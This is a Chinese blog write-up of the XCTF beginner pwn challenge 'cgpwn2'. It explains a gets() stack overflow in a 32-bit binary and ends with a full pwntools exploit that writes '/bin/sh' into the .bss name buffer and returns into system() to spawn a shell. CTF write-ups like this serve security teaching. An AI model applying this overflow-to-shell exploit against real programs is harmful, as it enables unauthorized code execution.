攻防世界pwn新手练习(cgpwn2)

题目链接

分析

我们来看这道题,首先checksec并运行一下
在这里插入图片描述
可以看到是32位程序,有两个输入点,保护只有 NX。

接下来我们在ida中看看分析。在hello函数的最后我们可以看到这些东西
在这里插入图片描述
这就是程序给我们的两个输入点,可以看到第二个是 gets ,那就很方便了,直接溢出利用就行,翻看其他函数我们可以发现有一个system函数

在这里插入图片描述

很遗憾的是只有system函数而没有我们需要的shellcode

看来只能我们自己往程序里面写了,可以发现的是第一个输入点哪儿有一个name,点击跟进

在这里插入图片描述

.bss 段的一个地址,我们知道NX开启的时候,.BSS也不一定就是不能执行的,我们可以先试试看,在第一个输入点输入 “/bin/sh”,第二个输入点溢出利用

在这里插入图片描述

结束了,它是可以成功利用的,over

构造payload的时候注意这是32位程序,而32位程序调用函数时栈的结构为:调用函数地址->函数的返回地址->参数n->参数n-1->···->参数1

exp

from pwn import *
context.log_level = 'info'

#r = remote('', )
r = process('./cgpwn2')
elf = ELF('./cgpwn2')

r.recvuntil("please tell me your name")
r.sendline("/bin/sh")

payload = 'a'*0x26 + 'a'*4 + p32(elf.sym['system']) + 'aaaa' + p32(0x0804A080) #最后这个是name地址,ida中复制即可
r.recvuntil("hello,you can leave some message here:")
r.sendline(payload)

r.interactive()

博客(buryia.top),欢迎师傅们来踩踩

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值